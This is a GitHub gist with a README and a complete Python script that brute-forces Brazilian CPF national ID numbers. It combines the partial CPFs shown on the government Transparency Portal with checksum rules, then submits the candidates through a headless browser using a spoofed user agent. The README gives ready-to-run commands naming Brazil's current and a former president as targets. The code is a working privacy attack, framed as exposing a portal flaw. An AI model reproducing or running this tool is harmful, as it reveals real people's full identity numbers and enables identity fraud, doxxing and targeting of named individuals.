Skip to content

Instantly share code, notes, and snippets.

@pedrogarciafreitas
Last active May 31, 2024 21:51
Show Gist options
  • Save pedrogarciafreitas/eb0b7915fc08e5d0267b61230c679a64 to your computer and use it in GitHub Desktop.
Save pedrogarciafreitas/eb0b7915fc08e5d0267b61230c679a64 to your computer and use it in GitHub Desktop.
Script to discover the whole CPF from portaldatransparencia.gov.br

BRUTE FORCE CPF FINDER

The CPF (Cadastro de Pessoas Físicas) is an identification document used in Brazil. It is a unique and individual number assigned to each Brazilian citizen. It is used for identification in various situations, such as opening bank accounts, making purchases, contracting services, among others. To obtain a CPF, it is necessary to register with the Federal Revenue Service.

This script uses one of the main services of the Brazilian federal government to discover information based on the registered citizen's name. It relies on the vulnerability of the Portal da Transparência, which exposes part of the citizen's CPF and censors only the first 3 digits and the verification digits. Since the CPF follows a restricted pattern of digits, by exposing 6 out of a total of 11 digits, the Transparency Portal reduces the number of combinations to 100,000. However, since the CPF uses the last 2 digits for verification of the previous 9, it is possible to reduce the space of possibilities to only 1,000 combinations, which is quite feasible for a brute force attack.

Meaning of the CPF Digits

The CPF consists of 11 digits and has a specific meaning for each one of them. A common representation of the CPF consists of grouping the first nine digits into three groups of three digits separated by a period, followed by a hyphen and the last two digits. Thus, the CPF number ABCDEFGHIJK is formatted as ABC.DEF.GHI-JK. In this case, the digits represented by J and K are used as verification digits.

Each digit of the CPF has a specific meaning. The first eight digits, ABCDEFGH, form the base number defined by the Federal Revenue Service at the time of registration. The ninth digit, I, defines the region where the CPF was issued. The tenth digit is the first verification digit. The eleventh digit is the second verification digit.

How Verification Digits Work

The first verification digit, J, is the verification digit for the first nine digits. The second verification digit, K, is the verification digit for the nine digits before it. The first nine digits are sequentially multiplied by the sequence {10, 9, 8, 7, 6, 5, 4, 3, 2} (the first by 10, the second by 9, and so on). Then, the remainder R of the division of the sum of the multiplication results by 11 is calculated. If the remainder is 0 or 1, the first digit is zero (i.e., J=0); otherwise, J=11 - R.

The second Verification Digit, K, is calculated by the same rule, where the numbers to be multiplied by the sequence {10, 9, 8, 7, 6, 5, 4, 3, 2} are counted starting from the second digit, with J now being the last digit. If S is the remainder of the division by 11 of the sum of the multiplications, then K will be 0 if S is 0 or 1. Otherwise, K=11-S.

How the Script Works

This script has 2 command-line parameters: --name (mandatory) and --keyword. The --name parameter should contain the full name of the citizen whose CPF you want to discover. If this full name is unique in the database, the script will handle downloading and parsing the partial CPF provided by the Portal da Transparência. Based on this partial CPF, the script generates all possible combinations, finds those valid according to the CPF validation algorithm described above, and then attempts, through brute force, to make a series of requests based on this generated and validated CPF. If the CPF exists in the database, the script notifies. The program stops when the found full name matches the name passed via the --name parameter.

For example, suppose you want to find the CPF of the president of Brazil, Mr. Luiz Inácio Lula da Silva:

python script.py  --name "LUIZ INACIO LULA DA SILVA"

After perform many attempts, the script will report all found CPFs in Portal da Transparência and then stops when the discovered CPF will correspond to the same name passed through --name.

Parameter --keyword: when the full name of the citizen whose CPF you want to discover is unique in the database, the above command is sufficient. However, in some cases, there may be homonymous or very similar names. In these cases, it is possible to pass the pattern of the partial CPF provided by the Transparency Portal itself (e.g., ***.680.938-**). In this case, you should provide the full name (i.e., parameter --name) as well as the --keyword parameter. Thus, the --keyword parameter will be used as the search criterion, and the `--name parameter as the stop criterion.

For instance, suppose you want to discover the complete CPF of the former president of Brazil, Ms. Dilma Vana Rousseff, knowing that part of her CPF is ***.267.246-**, as provided by the Portal da Transparência:

python script.py  --name "DILMA VANA ROUSSEFF" --keyword "***.267.246-**"

Example of execution of this script available in the video: https://youtu.be/c13g8o0wMJs.

import argparse
import re
import copy
from itertools import product
from dataclasses import dataclass
from absl import app
from absl.flags import argparse_flags
from fake_headers import Headers
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver import ChromeOptions
from selenium.common.exceptions import TimeoutException
from tqdm import tqdm
@dataclass
class Person:
name: str
CPF: str
status: str
def __init__(self, name, cpf, status):
self.name = name
self.CPF = cpf
self.status = status
def extract_single_person_pattern_match(match):
name = match.group('name').strip()
cpf = match.group('cpf')
status = match.group('status').strip()
person = Person(name, cpf, status)
return person
def extract_person_info(text):
# Define regex patterns to extract name, CPF, and status
name_pattern = r'(?P<name>[A-Z\s]+)\n'
cpf_pattern = r'CPF (?P<cpf>\*{3}\.\d{3}\.\d{3}-\*\*)\n'
status_pattern = r'(?P<status>.+?)(?=\n[A-Z]|$)'
pattern = name_pattern + cpf_pattern + status_pattern
matches = re.finditer(pattern, text)
person_info_list = [extract_single_person_pattern_match(match)
for match in matches]
return person_info_list
def is_valid_cpf(cpf):
cpf = [int(char) for char in cpf if char.isdigit()]
if len(cpf) != 11:
return False
if cpf == cpf[::-1]:
return False
# Valida os dois dígitos verificadores
for i in range(9, 11):
value = sum((cpf[num] * ((i+1) - num) for num in range(0, i)))
digit = ((value * 10) % 11) % 10
if digit != cpf[i]:
return False
return True
def extract_cpf_parts(cpf):
# Regular expression pattern to extract CPF parts
pattern = r'(\*\*\*).(\d{3}).(\d{3})-(\*\*)'
match = re.match(pattern, cpf)
if match:
first_part = match.group(1)
second_part = match.group(2)
third_part = match.group(3)
last_part = match.group(4)
return first_part, second_part, third_part, last_part
else:
return None
def get_combinations():
triplets = [''.join(map(str, c)) for c in product(range(10), repeat=3)]
tuples = [''.join(map(str, c)) for c in product(range(10), repeat=2)]
combinations = product(triplets, tuples)
return combinations
def get_all_cpfs_by_bruteforce(second_part, third_part):
all_combinations = get_combinations()
all_cpfs = []
for first_part, validation_digit in all_combinations:
parts = (first_part, second_part, third_part, validation_digit)
generated_cpf = "".join(parts)
all_cpfs.append(generated_cpf)
return all_cpfs
def get_all_valid_cpfs(second_part, third_part):
all_cpfs = get_all_cpfs_by_bruteforce(second_part, third_part)
valid_cpfs = [c for c in all_cpfs if is_valid_cpf(c)]
return valid_cpfs
class CPFFinder:
url = "https://portaldatransparencia.gov.br/pessoa-fisica/busca/lista?"
def __init__(self, name: str, keyword: str):
self.name = name
self.keyword = keyword
self.url = CPFFinder.url
self._start_crawler()
def _start_crawler(self):
header = Headers(browser="chrome", os="win", headers=False)
customUserAgent = header.generate()['User-Agent']
options = ChromeOptions()
options.add_argument('--headless')
options.add_argument("--enable-javascript")
options.add_argument(f"user-agent={customUserAgent}")
self.driver = webdriver.Chrome(options=options)
def _get_remote_info(self, keyword: str, wait_seconds: int = 5):
driver = copy.copy(self.driver)
driver.get(self.url)
input_field = driver.find_element(By.ID, "termo")
button = driver.find_element(By.ID, "btnBuscar")
input_field.send_keys(f"\"{keyword}\"")
input_field.send_keys(Keys.ENTER)
button.click()
try:
wait = WebDriverWait(driver, wait_seconds)
dynamic_content = wait.until(
EC.visibility_of_element_located((By.ID, "resultados")))
results = extract_person_info(dynamic_content.text)
return results
except TimeoutException:
return self._get_remote_info(keyword, wait_seconds + 10)
def _try_single_cpf(self, cpf):
results = self._get_remote_info(cpf)
if len(results) == 1:
found_person = Person(results[0].name, cpf, results[0].status)
print(f"{found_person} exists in DB.")
if self.name.lower() == found_person.name.lower():
return found_person
return None
def _try_cpfs_by_bruteforce(self, incomplete_cpf):
_, second_part, third_part, _ = extract_cpf_parts(incomplete_cpf)
valid_cpfs = get_all_valid_cpfs(second_part, third_part)
for cpf in (pbar := tqdm(valid_cpfs)):
pbar.set_description(f"Trying CPF {cpf}")
result = self._try_single_cpf(cpf)
if result:
return result
return None
def run(self):
if self.keyword is None:
results = self._get_remote_info(self.name)
if len(results) != 1:
msg = "Many results with this pattern."
msg += "Try a more specific one."
print(msg)
else:
incomplete_cpf = results[0].CPF
else:
incomplete_cpf = self.keyword
print(f"Parcial CPF: {incomplete_cpf}")
matched_person = self._try_cpfs_by_bruteforce(incomplete_cpf)
if matched_person:
print(f"Found -> {matched_person}")
def parse_args(argv):
parser = argparse_flags.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
parser.add_argument(
'--name',
type=str,
help='Nome completo da pessoa que se deseja descobrir o CPF',
)
parser.add_argument(
'--keyword',
type=str,
help='CPF parcial da pessoa',
default=None
)
return parser.parse_args(argv[1:])
def main(args):
CPFFinder(args.name, args.keyword).run()
if __name__ == "__main__":
app.run(main, flags_parser=parse_args)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment